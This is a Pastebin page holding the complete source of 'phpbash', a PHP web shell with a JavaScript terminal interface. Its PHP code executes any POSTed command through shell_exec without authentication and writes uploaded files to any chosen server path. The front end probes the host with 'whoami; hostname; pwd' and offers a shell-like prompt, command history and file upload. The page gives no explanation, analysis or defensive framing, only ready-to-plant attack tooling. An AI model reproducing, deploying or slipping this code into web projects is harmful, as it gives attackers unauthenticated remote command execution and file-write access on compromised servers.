API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 26th, 2018
78
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.99 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /* phpbash by Alexander Reid (Arrexel) */
  3. if (ISSET($_POST['cmd'])) {
  4. $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
  5. foreach ($output as $line) {
  6. echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
  7. }
  8. die();
  9. } else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
  10. $filename = $_FILES["file"]["name"];
  11. $path = $_POST['path'];
  12. if ($path != "/") {
  13. $path .= "/";
  14. }
  15. if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
  16. echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
  17. } else {
  18. echo "Error uploading " . htmlentities($filename);
  19. }
  20. die();
  21. }
  22. ?>
  23.  
  24. <html>
  25. <head>
  26. <title></title>
  27. <style>
  28. html, body {
  29. max-width: 100%;
  30. }
  31.  
  32. body {
  33. width: 100%;
  34. height: 100%;
  35. margin: 0;
  36. background: #000;
  37. }
  38.  
  39. body, .inputtext {
  40. font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
  41. font-size: 14px;
  42. font-style: normal;
  43. font-variant: normal;
  44. font-weight: 400;
  45. line-height: 20px;
  46. overflow: hidden;
  47. }
  48.  
  49. .console {
  50. width: 100%;
  51. height: 100%;
  52. margin: auto;
  53. position: absolute;
  54. color: #fff;
  55. }
  56.  
  57. .output {
  58. width: auto;
  59. height: auto;
  60. position: absolute;
  61. overflow-y: scroll;
  62. top: 0;
  63. bottom: 30px;
  64. left: 5px;
  65. right: 0;
  66. line-height: 20px;
  67. }
  68.  
  69. .input form {
  70. position: relative;
  71. margin-bottom: 0px;
  72. }
  73.  
  74. .username {
  75. height: 30px;
  76. width: auto;
  77. padding-left: 5px;
  78. line-height: 30px;
  79. float: left;
  80. }
  81.  
  82. .input {
  83. border-top: 1px solid #333333;
  84. width: 100%;
  85. height: 30px;
  86. position: absolute;
  87. bottom: 0;
  88. }
  89.  
  90. .inputtext {
  91. width: auto;
  92. height: 30px;
  93. bottom: 0px;
  94. margin-bottom: 0px;
  95. background: #000;
  96. border: 0;
  97. float: left;
  98. padding-left: 8px;
  99. color: #fff;
  100. }
  101.  
  102. .inputtext:focus {
  103. outline: none;
  104. }
  105.  
  106. ::-webkit-scrollbar {
  107. width: 12px;
  108. }
  109.  
  110. ::-webkit-scrollbar-track {
  111. background: #101010;
  112. }
  113.  
  114. ::-webkit-scrollbar-thumb {
  115. background: #303030;
  116. }
  117. </style>
  118. </head>
  119. <body>
  120. <div class="console">
  121. <div class="output" id="output"></div>
  122. <div class="input" id="input">
  123. <form id="form" method="GET" onSubmit="sendCommand()">
  124. <div class="username" id="username"></div>
  125. <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
  126. </form>
  127. </div>
  128. </div>
  129. <form id="upload" method="POST" style="display: none;">
  130. <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
  131. </form>
  132. <script type="text/javascript">
  133. var username = "";
  134. var hostname = "";
  135. var currentDir = "";
  136. var previousDir = "";
  137. var defaultDir = "";
  138. var commandHistory = [];
  139. var currentCommand = 0;
  140. var inputTextElement = document.getElementById('inputtext');
  141. var inputElement = document.getElementById("input");
  142. var outputElement = document.getElementById("output");
  143. var usernameElement = document.getElementById("username");
  144. var uploadFormElement = document.getElementById("upload");
  145. var fileBrowserElement = document.getElementById("filebrowser");
  146. getShellInfo();
  147.  
  148. function getShellInfo() {
  149. var request = new XMLHttpRequest();
  150.  
  151. request.onreadystatechange = function() {
  152. if (request.readyState == XMLHttpRequest.DONE) {
  153. var parsedResponse = request.responseText.split("<br>");
  154. username = parsedResponse[0];
  155. hostname = parsedResponse[1];
  156. currentDir = parsedResponse[2].replace(new RegExp("&sol;", "g"), "/");
  157. defaultDir = currentDir;
  158. usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
  159. updateInputWidth();
  160. }
  161. };
  162.  
  163. request.open("POST", "", true);
  164. request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  165. request.send("cmd=whoami; hostname; pwd");
  166. }
  167.  
  168. function sendCommand() {
  169. var request = new XMLHttpRequest();
  170. var command = inputTextElement.value;
  171. var originalCommand = command;
  172. var originalDir = currentDir;
  173. var cd = false;
  174.  
  175. commandHistory.push(originalCommand);
  176. switchCommand(commandHistory.length);
  177. inputTextElement.value = "";
  178.  
  179. var parsedCommand = command.split(" ");
  180.  
  181. if (parsedCommand[0] == "cd") {
  182. cd = true;
  183. if (parsedCommand.length == 1) {
  184. command = "cd "+defaultDir+"; pwd";
  185. } else if (parsedCommand[1] == "-") {
  186. command = "cd "+previousDir+"; pwd";
  187. } else {
  188. command = "cd "+currentDir+"; "+command+"; pwd";
  189. }
  190.  
  191. } else if (parsedCommand[0] == "clear") {
  192. outputElement.innerHTML = "";
  193. return false;
  194. } else if (parsedCommand[0] == "upload") {
  195. fileBrowserElement.click();
  196. return false;
  197. } else {
  198. command = "cd "+currentDir+"; " + command;
  199. }
  200.  
  201. request.onreadystatechange = function() {
  202. if (request.readyState == XMLHttpRequest.DONE) {
  203. if (cd) {
  204. var parsedResponse = request.responseText.split("<br>");
  205. previousDir = currentDir;
  206. currentDir = parsedResponse[0].replace(new RegExp("&sol;", "g"), "/");
  207. outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
  208. usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
  209. } else {
  210. outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
  211. outputElement.scrollTop = outputElement.scrollHeight;
  212. }
  213. updateInputWidth();
  214. }
  215. };
  216.  
  217. request.open("POST", "", true);
  218. request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  219. request.send("cmd="+encodeURIComponent(command));
  220. return false;
  221. }
  222.  
  223. function uploadFile() {
  224. var formData = new FormData();
  225. formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
  226. formData.append('path', currentDir);
  227.  
  228. var request = new XMLHttpRequest();
  229.  
  230. request.onreadystatechange = function() {
  231. if (request.readyState == XMLHttpRequest.DONE) {
  232. outputElement.innerHTML += request.responseText+"<br>";
  233. }
  234. };
  235.  
  236. request.open("POST", "", true);
  237. request.send(formData);
  238. outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
  239. }
  240.  
  241. function updateInputWidth() {
  242. inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
  243. }
  244.  
  245. document.onkeydown = checkForArrowKeys;
  246.  
  247. function checkForArrowKeys(e) {
  248. e = e || window.event;
  249.  
  250. if (e.keyCode == '38') {
  251. previousCommand();
  252. } else if (e.keyCode == '40') {
  253. nextCommand();
  254. }
  255. }
  256.  
  257. function previousCommand() {
  258. if (currentCommand != 0) {
  259. switchCommand(currentCommand-1);
  260. }
  261. }
  262.  
  263. function nextCommand() {
  264. if (currentCommand != commandHistory.length) {
  265. switchCommand(currentCommand+1);
  266. }
  267. }
  268.  
  269. function switchCommand(newCommand) {
  270. currentCommand = newCommand;
  271.  
  272. if (currentCommand == commandHistory.length) {
  273. inputTextElement.value = "";
  274. } else {
  275. inputTextElement.value = commandHistory[currentCommand];
  276. setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
  277. }
  278. }
  279.  
  280. document.getElementById("form").addEventListener("submit", function(event){
  281. event.preventDefault()
  282. });
  283. </script>
  284. </body>
  285. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!